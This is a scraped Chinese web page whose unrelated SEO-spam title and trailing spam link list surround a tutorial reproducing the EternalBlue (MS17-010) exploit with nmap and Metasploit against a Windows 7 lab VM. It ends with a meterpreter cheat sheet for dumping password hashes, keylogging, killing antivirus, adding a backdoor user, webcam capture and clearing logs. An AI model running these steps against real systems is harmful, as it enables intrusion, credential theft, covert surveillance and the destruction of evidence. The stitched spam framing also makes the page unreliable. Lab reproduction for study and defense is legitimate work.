当前位置: 首页 > news >正文

宁波网络推广产品服务seo是干什么的

宁波网络推广产品服务,seo是干什么的,微博推广渠道,广告灯箱设计制作价格1、永恒之蓝#xff08;Eternal Blue#xff09; 永恒之蓝是指2017年4月14日晚#xff0c;黑客团体Shadow Brokers#xff08;影子经纪人#xff09;公布一大批网络攻击工具#xff0c;其中包含“永恒之蓝”工具#xff0c;“永恒之蓝”利用Windows系统的SMB漏洞可以获…1、永恒之蓝Eternal Blue 永恒之蓝是指2017年4月14日晚黑客团体Shadow Brokers影子经纪人公布一大批网络攻击工具其中包含“永恒之蓝”工具“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招被勒索支付高额赎金才能解密恢复文件。 2、复现环境 角色操作系统IP地址攻击机kali192.168.126.131靶机Windows 7 家庭普通版192.168.126.147 注意VMware Workstation pro16安装win7靶机安装VWware tools时提示驱动无法自动安装是因为微软更新了驱动程序签名算法2019年开始弃用SHA1改用SHA2所以要打kb4474419补丁但是打上补丁后永恒之蓝漏洞会被修复所以安装完tools后需要把补丁卸载 3、漏洞复现 主机发现 利用kali的nmap进行扫描 nmap 192.168.126.147扫描到开放了445端口而永恒之蓝利用的就是445端口的smb服务操作系统溢出漏洞。 使用msf框架 在kali终端输入 # 进入msf模板库 msfconsole# 寻找MS17-010相关模板库 search ms17-010进入msf模块 使用auxiliary/scanner/smb/smb_ms17_010 模块扫描靶机是否存在该漏洞 # 选择使用exploit/windows/smb/ms17_010_psexec模块 msf6 use auxiliary/scanner/smb/smb_ms17_010查看模块需要配置的参数 show options图中Required值为yes的对应Current Setting都需要填写 设置参数后扫描 RHOSTS 参数是要探测主机的ip或ip范围 设置攻击目标ip # 设置目标主机IP set rhosts 192.168.126.147# 扫描 run提示主机容易被攻击 使用exploit/windows/smb/ms17_010_eternalblue攻击模块 # 使用攻击模块 use exploit/windows/smb/ms17_010_eternalblue# 查看漏洞信息 info# 查看可以攻击的系统 show targets# 查看该漏洞下可以使用的payload show payloads# 查看需要设置的参数 show options# 设置payload默认payload/windows/x64/meterpreter/reverse_tcp set payload windows/x64/meterpreter/reverse_tcp# 设置目标IP set rhosts 192.168.126.147# 执行攻击 run在这里可以执行文件上传下载获取截屏获取密码使用摄像头后门持久化等操作 4、后渗透阶段 在meterpreter 中我们可以使用以下的命令来实现对目标的操作 sysinfo #查看目标主机系统信息 run scraper #查看目标主机详细信息 hashdump #导出密码的哈希 load kiwi #加载 ps #查看目标主机进程信息 pwd #查看目标当前目录(windows) getlwd #查看目标当前目录(Linux) search -f *.jsp -d e:\ #搜索E盘中所有以.jsp为后缀的文件 download e:\test.txt /root #将目标机的e:\test.txt文件下载到/root目录下 upload /root/test.txt d:\test #将/root/test.txt上传到目标机的 d:\test\ 目录下getpid #查看当前Meterpreter Shell的进程 PIDmigrate 1384 #将当前Meterpreter Shell的进程迁移到PID为1384的进程上 idletime #查看主机运行时间 getuid #查看获取的当前权限 getsystem #提权 run killav #关闭杀毒软件 screenshot #截图 webcam_list #查看目标主机的摄像头 webcam_snap #拍照 webcam_stream #开视频 execute 参数 -f 可执行文件 #执行可执行程序 run getgui -u hack -p 123 #创建hack用户密码为123 run getgui -e #开启远程桌面 keyscan_start #开启键盘记录功能 keyscan_dump #显示捕捉到的键盘记录信息 keyscan_stop #停止键盘记录功能 uictl disable keyboard #禁止目标使用键盘 uictl enable keyboard #允许目标使用键盘 uictl disable mouse #禁止目标使用鼠标 uictl enable mouse #允许目标使用鼠标 load #使用扩展库 run #使用扩展库 clearev #清除日志
http://www.dnsts.com.cn/news/179779.html

相关文章:

  • 南京网站维护html5开发工具有哪些
  • 自己的网站建设合肥 做网站的公司
  • vs2012网站开发环境it运维工资
  • 备份整个网站洗头竖鞋带名片改良授权做网站不贵
  • 企业网站货物查询怎么做WordPress中文seo
  • 企业网站建设价格上传wordpress到服务器
  • 襄阳做网站公司有哪些搜索引擎推广的特点
  • wordpress $数组网站内容seo
  • 搭建网站php源码简述网站开发工作流程
  • 网站备案完才能建站吗2024最新版qq官方下载
  • 做视频比较好的理财网站有哪些wordpress分页重写
  • 钟表商城网站建设方案做网站怎么不被找到
  • 我想做个卷帘门网站怎么做网站构成的作用是什么
  • 免备案服务器推荐seo优化顾问服务阿亮
  • 化州 网站建设厦门网站设计公司找哪家福建小程序开发
  • 交通运输行业网站建设cetos做网站
  • 上海市住房和城乡建设厅网站查询广告公司业务推广
  • 企业做网站价格软件设计和软件开发的区别
  • 自己做的影视会员网站违法么wordpress 增加域名
  • 建设 公司 网站 请示网站备案产品信息错误
  • 家居行业网站开发个人网站主页设计
  • 厦门网站建设方案报价上海浦东医院网站建设
  • frontpage建设网站的图片视频号分销解决方案的特点
  • 不花钱网站怎么做cad效果图怎么制作
  • 中文企业网站模板htmlwordpress json api auth
  • 做药物研发的人上什么网站兰州网站建设营销q479185700刷屏
  • 免费凡科网站会员卡系统一般哪里买
  • 做微信公众号网站源码上海开发小程序
  • 网页设计网站结构图怎么弄网站页面布局用什么做
  • 正规网站建设商家worldpress和wordpress